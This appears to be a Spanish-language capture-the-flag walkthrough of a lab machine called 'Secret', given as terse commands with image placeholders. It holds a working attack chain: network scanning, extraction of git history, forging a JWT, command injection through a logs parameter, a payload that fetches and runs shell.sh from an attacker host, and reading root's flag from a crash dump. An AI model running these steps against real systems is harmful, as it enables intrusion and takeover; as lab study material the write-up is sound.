nmap -A -p- -oA secret 10.129.251.66 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA secret 10.129.251.66

nmap -sU -O -p- -oA secret-udp 10.129.251.66

nikto -h 10.129.251.66:80

Pasted image 20211107113432.png

Pasted image 20211107114011.png

whatweb http://10.129.251.66

Pasted image 20211107114259.png

Vamos a http://10.129.251.66/api

Pasted image 20211107114701.png

Bajo el codigo

Pasted image 20211107115046.png

Bajamos GitTool

https://github.com/internetwache/GitTools

bash GitTools/Extractor/extractor.sh /local-web secret

Pasted image 20211107121730.png

ls -ahl

Pasted image 20211107121957.png

cat 0-67...

Pasted image 20211107122222.png

cat 1-55..

Pasted image 20211107122252.png

curl -X POST -H 'Content-Type: application/json' -v http://secret.htb/api/user/register --data

Pasted image 20211107122459.png

curl -X POST -H 'Content-Type: application/json' -v http://secret.htb/api/user/register --data '{"name": "cu3rv0x","email": "test@gmail.com","password": "password123"}'

Pasted image 20211107122907.png

curl -X POST -H 'Content-Type: application/json' -v http://secret.htb/api/user/login --data '{"email": "test@gmail.com","password": "password123"}'

Pasted image 20211107123319.png

curl http://secret.htb/api/priv -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTdlMjgxZWU2N2QzZTA4NTMzOGEzZjYiLCJuYW1lIjoib29wc2llIiwiZW1haWwiOiJvb3BzaWVAb29wcy5jb20iLCJpYXQiOjE2MzU2NTc4NTd9.7v-DST155DL_5yuhC9Zbe2rdyPiGCcd8aeYUucQLVzU'

Pasted image 20211107123634.png

python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTdlMjgxZWU2N2QzZTA4NTMzOGEzZjYiLCJuYW1lIjoib29wc2llIiwiZW1haWwiOiJvb3Bz aWVAb29wcy5jb20iLCJpYXQiOjE2MzU2NTc4NTd9.7v-DST155DL_5yuhC9Zbe2rdyPiGCcd8aeYUucQLVzU

curl 'http://secret.htb/api/logs?file=;id' -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTdlMjgxZWU2N2QzZTA4NTMzOGEzZjYiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6Im9vcHNpZUBvb3BzLmNvbSIsImlhdCI6MTYzNTY1Nzg1N30.atZrtL6UzhLQNDANrsNWeiv9wt4dzdYeOLaiGeNahcw'

curl 'http://secret.htb/api/logs?file=;curl+http://10.129.14.66:8000/shell.sh+|+bash' -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTdlMjgxZWU2N2QzZTA4NTMzOGEzZjYiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6Im9vcHNpZUBvb3BzLmNvbSIsImlhdCI6MTYzNTY1Nzg1N30.atZrtL6UzhLQNDANrsNWeiv9wt4dzdYeOLaiGeNahcw'

Pasted image 20211107123740.png

Nos dirigimos a /opt

./count -p

/root/root.txt

y Pasted image 20211210165519.png

En otra shell hacemos lo siguiente:

ps -aux | grep count

kill -9 -BUS 1503

Ahora vemos que en el primer shell dice: Path: Bus error (core dumped)

Pasted image 20211210165729.png

cd /var/crash

ls -al

mkdir /tmp/cu3rv0x

apport-unpack _opt_count.1000.crash /tmp/cu3rv0x

cd /tmp/cu3rv0x

Pasted image 20211210165941.png

strings CoreDump

Pasted image 20211210170317.png

Logramos ver el hash de root.txt

Pasted image 20211210170340.png

boxes

copyright©2022 Cu3rv0x all rights reserved